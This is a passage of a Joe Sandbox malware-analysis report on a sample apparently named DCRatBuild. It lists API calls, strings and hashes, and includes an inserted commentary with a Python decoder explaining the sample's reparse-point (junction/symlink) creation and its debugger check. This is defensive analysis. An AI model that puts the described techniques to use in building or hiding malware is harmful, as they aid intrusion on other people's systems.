                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                        • API String ID: 797121971-1840816070
                                        • Opcode ID: 6737ab9f7e0b428fd58d4a4e64451704c7d137871a24383a68ef2f0211b2d6bc
                                        • Instruction ID: ebb5cfe9adb25122fe78c39ac1690ebdcf47b91d612988361b4e6a0a821bd274
                                        • Opcode Fuzzy Hash: 6737ab9f7e0b428fd58d4a4e64451704c7d137871a24383a68ef2f0211b2d6bc
                                        • Instruction Fuzzy Hash: FB9186B2644348BBE6319BA0DC89FFB77ACEB4A700F044819F749D2091D779EA05C766
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737191
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 007372F1
                                        • CloseHandle.KERNEL32(00000000), ref: 00737301
                                          • Part of subcall function 00737BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00737C04
                                          • Part of subcall function 00737BF5: GetLastError.KERNEL32 ref: 00737C4A
                                          • Part of subcall function 00737BF5: CloseHandle.KERNEL32(?), ref: 00737C59
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0073730C
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0073741A
                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00737446
                                        • CloseHandle.KERNEL32(?), ref: 00737457
                                        • GetLastError.KERNEL32 ref: 00737467
                                        • RemoveDirectoryW.KERNEL32(?), ref: 007374B3
                                        • DeleteFileW.KERNEL32(?), ref: 007374DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3935142422-3508440684
                                        • Opcode ID: a5e8d2beacb28945ccea81fa477e7bbf1724d5c25e684277930d73f5a71eac21
                                        • Instruction ID: 14bb765b0c1b4c7de9b825ac4176b868e94f7e3e8fc324e006b724a4b3edfacb
                                        • Opcode Fuzzy Hash: a5e8d2beacb28945ccea81fa477e7bbf1724d5c25e684277930d73f5a71eac21
                                        • Instruction Fuzzy Hash: 70B1F2B1904255EBEF25DFA4CC45FEE77B8AF04300F004569F94AE7142E778AA48CBA1
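The function at 00737191 opens a path with GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING and the flags 0x02200000, then issues DeviceIoControl with control code 0x000900A4 on that handle, alongside the strings SeCreateSymbolicLinkPrivilege, SeRestorePrivilege, UNC\ and \??\. Those raw numbers are what an analyst has to decode to understand the call: 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT and 0x000900A4 is FSCTL_SET_REPARSE_POINT, i.e. the sequence used to write a junction or symbolic link. The following Python decoder is an added example, not part of the Joe Sandbox report and not code from the sample; the constant values come from the Windows SDK, the helper names (decode_ioctl, decode_createfile, is_reparse_point_write) are our own, and the sample inputs are the values copied from the listing above.

```python
# Added example (not part of the Joe Sandbox report or the analysed sample):
# decode raw CreateFileW / DeviceIoControl arguments as they appear in a
# sandbox API listing. Constant values are from the Windows SDK headers.

# CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method
FILE_DEVICE_NAMES = {0x00000009: "FILE_DEVICE_FILE_SYSTEM"}
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}

# Reparse-point FSCTLs: CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41/42/43, METHOD_BUFFERED, FILE_ANY_ACCESS)
KNOWN_IOCTLS = {
    0x000900A4: "FSCTL_SET_REPARSE_POINT",
    0x000900A8: "FSCTL_GET_REPARSE_POINT",
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",
}

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_AND_ATTRIBUTES = {
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}


def decode_ioctl(code):
    """Split a CTL_CODE value into DeviceType / Function / Method / Access."""
    device = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "device": FILE_DEVICE_NAMES.get(device, hex(device)),
        "function": function,
        "method": METHOD_NAMES[method],
        "access": ACCESS_NAMES[access],
    }


def _flag_names(value, table):
    """Expand a bitmask into the names in `table`, lowest bit first; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def decode_createfile(desired_access, creation_disposition, flags_and_attributes):
    """Name the dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes arguments."""
    return {
        "access": _flag_names(desired_access, GENERIC_ACCESS),
        "disposition": CREATION_DISPOSITION.get(creation_disposition, hex(creation_disposition)),
        "flags": _flag_names(flags_and_attributes, FLAGS_AND_ATTRIBUTES),
    }


def is_reparse_point_write(createfile_flags, ioctl_code):
    """True when a handle opened with FILE_FLAG_OPEN_REPARSE_POINT is fed to
    FSCTL_SET_REPARSE_POINT, the pair that creates a junction or symlink."""
    return bool(createfile_flags & 0x00200000) and ioctl_code == 0x000900A4


if __name__ == "__main__":
    # Values copied from the listing: CreateFileW at 0073741A, DeviceIoControl at 00737446
    print(decode_createfile(0xC0000000, 3, 0x02200000))
    print(decode_ioctl(0x000900A4))
    print(is_reparse_point_write(0x02200000, 0x000900A4))
```

The first CreateFileW in the same function (0x40000000, disposition 1, attributes 0x80) decodes to GENERIC_WRITE, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, so the routine first creates a placeholder file (or directory via CreateDirectoryW) and then reopens it with reparse-point semantics to set the link target; RemoveDirectoryW and DeleteFileW after GetLastError are the cleanup path when the FSCTL fails.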
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog_memcmp
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 3004599000-3282847064
                                        • Opcode ID: b13512016bfd4e2276d17af02334dcd322d9f1bae6fdc72d266fbe68f55b9a04
                                        • Instruction ID: 06bfedf557d382076dea6b0bf25ce7cda4dcdf09eb1648bec94ddf7540fb5389
                                        • Opcode Fuzzy Hash: b13512016bfd4e2276d17af02334dcd322d9f1bae6fdc72d266fbe68f55b9a04
                                        • Instruction Fuzzy Hash: 1F32A671510684DFEF25DF34C896AEA37A5AF14300F04457EFD8A8B283DB78A948CB60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 5a16100cb5cfd50cf1466a1bc02fa6d0221c7c2da2ab63bd08d6467d85b0114f
                                        • Instruction ID: 6ab2fa7fc4b697129138d558434c73293f25494d87f38464fb59b113ec0a82be
                                        • Opcode Fuzzy Hash: 5a16100cb5cfd50cf1466a1bc02fa6d0221c7c2da2ab63bd08d6467d85b0114f
                                        • Instruction Fuzzy Hash: 29C23C71E046288FDB39CE28DD447E9B7B5EB44306F1545EAD80DE7240E7B9AE898F40
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 007327F1
                                        • _strlen.LIBCMT ref: 00732D7F
                                          • Part of subcall function 0074137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0073B652,00000000,?,?,?,00050160), ref: 00741396
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00732EE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1706572503-2756464174
                                        • Opcode ID: f4b0c00e3f5fb40aefbd90f07da6fd1700e67ce89265622a82ed52963108a893
                                        • Instruction ID: adebcf6dc3ae84b27ada12d68c7eae86868b7eb97b2b6a2c6953bfd463fae083
                                        • Opcode Fuzzy Hash: f4b0c00e3f5fb40aefbd90f07da6fd1700e67ce89265622a82ed52963108a893
                                        • Instruction Fuzzy Hash: 0262F571600244CFEF29DF34C8896EA3BE1AF54300F15457DED9A9B283DB79A946CB60
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00758767
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00758771
                                        • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0075877E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: acf75632de73cdb6d273d2ca81d9d497b7d22e897a26f4ccda94d49b17b37912
                                        • Instruction ID: d3a0d7876b9656f731b39a4d423cdc890c8d8208390489f180642ccef9bdfe85
                                        • Opcode Fuzzy Hash: acf75632de73cdb6d273d2ca81d9d497b7d22e897a26f4ccda94d49b17b37912
                                        • Instruction Fuzzy Hash: 4731B37590122C9BCB61DF64D889BDCBBB8BF48310F5041EAE81CA7251EB749B858F45
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                        • Instruction ID: 6feb8eefc141e11638c4d021b56b68d8c2bd510af6ccf8b483d2c2c0431f0f19
                                        • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                        • Instruction Fuzzy Hash: 8A024C72E002199FDF15CFA9C8807EDBBF1EF48325F25416AD819E7284D775AA45CB80
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0074A662
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0076E600,?,?), ref: 0074A6B1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: d817aed05cbf5d42bf5fb9f768a34ae708298eea07cd5a1a5f7ea0dc6534adc0
                                        • Instruction ID: 4d3a377d9e44f48953aed2d4282ea357bb1e1ce17dc9c69f946e4f6453cc5405
                                        • Opcode Fuzzy Hash: d817aed05cbf5d42bf5fb9f768a34ae708298eea07cd5a1a5f7ea0dc6534adc0
                                        • Instruction Fuzzy Hash: E4017176540308BFDB109F65EC09F9B77BCEF19710F108822FA0597150E3B49A24C7A9
                                        APIs
                                        • GetLastError.KERNEL32(0074117C,?,00000200), ref: 00736EC9
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00736EEA
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 692a490164ce2617640b13e52c9dda4b77f5eccad386cf57d7edec57864402f9
                                        • Instruction ID: e79e0b49e493c246e52b39b3a8677e8e67145de019a64cb3db539a6b13ed2519
                                        • Opcode Fuzzy Hash: 692a490164ce2617640b13e52c9dda4b77f5eccad386cf57d7edec57864402f9
                                        • Instruction Fuzzy Hash: 6FD092352C8302BAFA110A748C06F2A7BA5B755B82F20C514B257ED0E1CAB490289629
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0076118F,?,?,00000008,?,?,00760E2F,00000000), ref: 007613C1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 8d1a750396115dfd588d0cf5f02e816cc2b4d62206cae5274885ac03b2eb57d4
                                        • Instruction ID: 8a4d39cf86688f18e897251a03eb289cbd3ba325b213daa3a4b4680768aec007
                                        • Opcode Fuzzy Hash: 8d1a750396115dfd588d0cf5f02e816cc2b4d62206cae5274885ac03b2eb57d4
                                        • Instruction Fuzzy Hash: 5EB15D71610608DFD719CF28C48AB657BE0FF45364F698698ED9ACF2A1C739E981CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        • Opcode ID: 7b50b6d83b1c7c0f2cb65b603caa04fff4bf451b706d5fed9010ba455ade017b
                                        • Instruction ID: ff2ea4393e3f02c3208bc5a7c5552a32178c28c6f402ccc669228623af1c4687
                                        • Opcode Fuzzy Hash: 7b50b6d83b1c7c0f2cb65b603caa04fff4bf451b706d5fed9010ba455ade017b
                                        • Instruction Fuzzy Hash: 22F1C2B1A083418FD748CF29D880A1AFBE1BFCC208F15892EF599D7711E634E9558B56
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0073AD1A
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: ad279aaceb11945c5fdf6ac74504bc1e4f7332830bf080ac795ff6bab4f6ba1b
                                        • Instruction ID: 0d3ec0cd33becad4cb1e2de6e4c29fc3157da3d701f0b5a6bf7a2b7b87302ecc
                                        • Opcode Fuzzy Hash: ad279aaceb11945c5fdf6ac74504bc1e4f7332830bf080ac795ff6bab4f6ba1b
                                        • Instruction Fuzzy Hash: 2EF06DB8A0030CCFDB28DB18EC426E973B1F748305F208295D91983368D7B8AD80CEA5
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0074EAC5), ref: 0074F068
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8f71d5347ac4f04d83a4a19a40720c00280a325e340c2fc0506e69a76c6d31c2
                                        • Instruction ID: 235fb6ab5ffc3edb50ecfdd6c078eacb24c90d92f0e555ea521299f809fa0efc
                                        • Opcode Fuzzy Hash: 8f71d5347ac4f04d83a4a19a40720c00280a325e340c2fc0506e69a76c6d31c2
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: eb7e974525d8f736928b1d43127866783c5d674e1b054641f9ab2c4746b48cc2
                                        • Instruction ID: cf0f9d1210e699111860ab173f4dc79d51d8fedd9ae7febfcecaf8f9738077d7
                                        • Opcode Fuzzy Hash: eb7e974525d8f736928b1d43127866783c5d674e1b054641f9ab2c4746b48cc2
                                        • Instruction Fuzzy Hash: 90A012705002018B83008F31590820835A96501180304C1159005C1060DA2844308F04
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                        • Instruction ID: 314e7aaff7bf4e282365e2ebb93adca7635487135f79277edd856ef81d487464
                                        • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                                        • Instruction Fuzzy Hash: 6C62F871604B899FCB29CF38C8906B9BBE1AF56304F04856DD9EA8B347D738E945CB11
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
